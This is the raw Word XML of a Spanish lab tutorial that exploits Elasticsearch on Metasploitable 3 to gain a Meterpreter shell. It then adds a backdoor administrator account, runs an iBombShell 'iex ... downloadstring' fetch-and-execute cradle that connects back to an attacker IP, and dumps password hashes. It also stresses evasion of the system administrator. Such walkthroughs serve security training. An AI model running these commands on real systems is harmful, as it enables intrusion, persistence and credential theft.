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Para esta práctica se aprovechará la vulnerabilidad de </w:t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elasticsearch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> en Metasploitable 3. Para esto iniciamos msfconsole y seleccionar el exploit a utilizar con el comando use de la herrramienta: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Style w:val="CdigoHTML"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>Use exploit/multi/elasticsearch/script_mvel_rce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355070" cy="1334135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="Imagen 33" descr="Captura de Pantalla 2019-04-29 a la(s) 17.5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2019-04-29 a la(s) 17.57.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507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Nota:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> es importante agregar el RHOST que será el equipo objetivo.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:br/>
        <w:t>Nos devolverá una Shell Meterpreter.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0972800" cy="1678940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="Imagen 32" descr="Captura de Pantalla 2019-04-29 a la(s) 17.5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2019-04-29 a la(s) 17.58.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Con el comando </w:t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pwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> mostrará la dirección donde te encuentras.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452225" cy="1311910"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="31" name="Imagen 31" descr="Captura de Pantalla 2019-04-29 a la(s) 17.58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2019-04-29 a la(s) 17.58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222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Para obtener el número de proceso mediante </w:t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getpid.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452225" cy="1311910"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="30" name="Imagen 30" descr="Captura de Pantalla 2019-04-29 a la(s) 17.5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 de Pantalla 2019-04-29 a la(s) 17.58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222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El usuario se obtiene con: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452225" cy="1311910"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="29" name="Imagen 29" descr="Captura de Pantalla 2019-04-29 a la(s) 17.5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 de Pantalla 2019-04-29 a la(s) 17.59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222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Para conocer mayores detalles del sistema operativo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452225" cy="1851025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Imagen 28" descr="Captura de Pantalla 2019-04-29 a la(s) 17.5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 de Pantalla 2019-04-29 a la(s) 17.59.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222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Con el comando </w:t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ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> se mostrarán los procesos corriendo dentro del sistema.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452225" cy="6708140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="Imagen 27" descr="Captura de Pantalla 2019-04-29 a la(s) 17.5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a de Pantalla 2019-04-29 a la(s) 17.59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2225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Conocer su tabla ARP ayudará determinar rápidamente equipos dentro de la red.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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="9923780" cy="8267065"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="26" name="Imagen 26" descr="Captura de Pantalla 2019-04-29 a la(s) 17.5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 de Pantalla 2019-04-29 a la(s) 17.59.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780" cy="826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lastRenderedPageBreak/>
        <w:t>Obteniendo una Shell del sistema y utilizando escritorio remoto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:br/>
        <w:t>Se ejecuta el comando Shell.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04930" cy="3448050"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="25" name="Imagen 25" descr="Captura de Pantalla 2019-04-29 a la(s) 17.5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 de Pantalla 2019-04-29 a la(s) 17.59.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9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Obteniendo los usuarios.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04930" cy="4879340"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="24" name="Imagen 24" descr="Captura de Pantalla 2019-04-29 a la(s) 17.5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a de Pantalla 2019-04-29 a la(s) 17.59.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93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Agregar un usuario de nombre </w:t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pedro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> y el password </w:t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pedro1234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04930" cy="1334135"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="23" name="Imagen 23" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ura de Pantalla 2019-04-29 a la(s) 18.00.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93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Después agregarlo al grupo de administradores con el comando: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04930" cy="1334135"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="22" name="Imagen 22" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ura de Pantalla 2019-04-29 a la(s) 18.00.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93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En otra terminal se ejecuta el comando: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04930" cy="1334135"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="21" name="Imagen 21" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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 de Pantalla 2019-04-29 a la(s) 18.00.3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93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Hasta aquí todo bien, pero el tener un usuario extra es muy evidente y el administrador de sistemas puede sospechar rápidamente. Por lo cual se hará uso de la herramienta </w:t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Ibombshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> la cual está escrita en Powershell que permite rápidamente obtener funcionalidades post-exploit en cualquier instante y sistema operativo a través de un repositorio de Github.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Es una shell remota que se carga directamente en memoria sin ser almacenado en disco, por lo cual se dejan menos rastros y proporciona acceso a una gran cantidad de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>características de pentesting.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04930" cy="4684395"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1905"/>
            <wp:docPr id="20" name="Imagen 20" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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tura de Pantalla 2019-04-29 a la(s) 18.00.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493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Jugando con IbombShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:br/>
        <w:t>En el equipo donde se encuentra Kali Linux se descarga el repositorio de “ibombshell” en el siguiente enlace.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
            <w:spacing w:val="3"/>
          </w:rPr>
          <w:t>https://github.com/ElevenPaths/ibombshell</w:t>
        </w:r>
      </w:hyperlink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Se extrae la carpeta en el directorio de su elección para este ejercicio en la carpeta descargas.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
            <w:spacing w:val="3"/>
          </w:rPr>
          <w:t>https://github.com/ElevenPaths/ibombshell/archive/master.zip</w:t>
        </w:r>
      </w:hyperlink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Para descomprimir con el comando unzip ibombshell-master.zip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9983470" cy="2683510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="19" name="Imagen 19" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.00.5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347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Se ingresa a la carpeta ibombshell-master/ibomshell c2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737340" cy="1769110"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="18" name="Imagen 18" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.01.0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34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Ejecutar el comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>pip install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> para instalar.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737340" cy="1888490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Imagen 17" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ura de Pantalla 2019-04-29 a la(s) 18.01.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734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Para iniciar e ingresa pyhton3 </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
            <w:spacing w:val="3"/>
          </w:rPr>
          <w:t>ibombshell.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>, con lo cual aparecerá la siguiente pantalla una vez terminada la carga.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0687685" cy="6055995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="16" name="Imagen 16" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.01.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68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Se crea un listener, para esto es necesario cargar el módulo.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Style w:val="CdigoHTML"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>load modules/listener.py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790045" cy="1925955"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="15" name="Imagen 15" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.01.5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004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Para ver las opciones que presenta el módulo se ejecuta el comando “show”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7007860" cy="5943600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14" name="Imagen 14" descr="Captura de Pantalla 2019-04-29 a la(s) 18.02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ptura de Pantalla 2019-04-29 a la(s) 18.02.0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 xml:space="preserve">Se puede utilizar los parámetros por defecto, pero si el puerto de escucha se encuentra ocupado pueden utilizar otro sin problema. Para iniciar el módulo con el comando “run”, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>quedando a la escucha en espera de una conexión.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1619250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Imagen 13" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.02.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Para realizar una conexión, en el equipo donde se encuentra instalado Metaploitable 3 se inicia escritorio remoto y con el usuario previamente creado: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Usuario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> pedro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Password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> pedro1234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7030085" cy="4976495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Imagen 12" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.02.3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Se prosigue a abrir Powershell y se ejecuta el siguiente comando para obtener una consola de Ibombshell.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Style w:val="CdigoHTML"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)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1483995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="11" name="Imagen 11" descr="Captura de Pantalla 2019-04-29 a la(s) 18.02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ptura de Pantalla 2019-04-29 a la(s) 18.02.4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Para obtener una consola que se comunique con nuestro equipo se ejecuta el comando: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Style w:val="CdigoHTML"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>console -Silently -uriConsole http://192.168.2.5:8080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1101725"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="10" name="Imagen 10" descr="Captura de Pantalla 2019-04-29 a la(s) 18.03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ptura de Pantalla 2019-04-29 a la(s) 18.03.0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Al ejecutar el comando anterior, se mostrará en nuestro módulo de Ibombshell un nuevo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>warrior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> (Equipo conectado).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1101725"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="9" name="Imagen 9" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.03.0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Para ver el listado de los warrios se ejecuta el comando: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Style w:val="CdigoHTML"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>Warrior list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1101725"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="8" name="Imagen 8" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.03.1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Se configura el módulo para establecer la comunicación.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644525"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="7" name="Imagen 7" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.03.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Después se selecciona el warrior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644525"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="6" name="Imagen 6" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.03.3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Se manda una instrucción en este caso “whoami”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704850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Imagen 5" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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aptura de Pantalla 2019-04-29 a la(s) 18.03.4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Con el comando run se mostrará el resultado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2420620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Imagen 4" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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aptura de Pantalla 2019-04-29 a la(s) 18.03.5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Para obtener las credenciales del equipo basta con carga el módulo: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Style w:val="CdigoHTML"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>Load modules/credentials/invoke-powerdump.py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817245"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="3" name="Imagen 3" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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aptura de Pantalla 2019-04-29 a la(s) 18.04.0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Se establece el warrior que sigue siendo el mismo.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817245"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2" name="Imagen 2" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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aptura de Pantalla 2019-04-29 a la(s) 18.04.0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lastRenderedPageBreak/>
        <w:t>Se ejecuta con el comando “Run” y se obtienen los usuarios junto con los hashes de las contraseñas.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:noProof/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="11527155" cy="6055995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1" name="Imagen 1" descr="Captura de Pantalla 2019-04-29 a la(s) 18.0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ptura de Pantalla 2019-04-29 a la(s) 18.04.1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7155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F5" w:rsidRDefault="000D3DF5" w:rsidP="000D3DF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="13161C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Entre otras cosas interesante que permite Ibombshell es desactivar el análisis en tiempo real de Windows Defender, bypass de UAC, obtener llaves SSH y realizar movimientos laterales. Como pueden observar una herramienta muy interesante que debemos añadir en nuestro arsenal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3DF5" w:rsidRDefault="000D3DF5" w:rsidP="000D3DF5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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>Repo GitHub : </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c"/>
            <w:spacing w:val="3"/>
          </w:rPr>
          <w:t>https://github.com/ElevenPaths/ibombshell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DB2342" w:rsidRDefault="000D3DF5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71"/>
    <w:rsid w:val="00075EE0"/>
    <w:rsid w:val="000D3DF5"/>
    <w:rsid w:val="00B66B71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D3DF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D3DF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D3DF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D3DF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D3DF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D3DF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7.jpeg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hyperlink" Target="https://github.com/ElevenPaths/ibombshell/archive/master.zip" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ElevenPaths/ibombshell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ibombshell.py/" TargetMode="External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7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6.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ElevenPaths/ibombshell" TargetMode="External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6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3724</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>31</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Luffi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2024-07-09T04:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-09T04:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>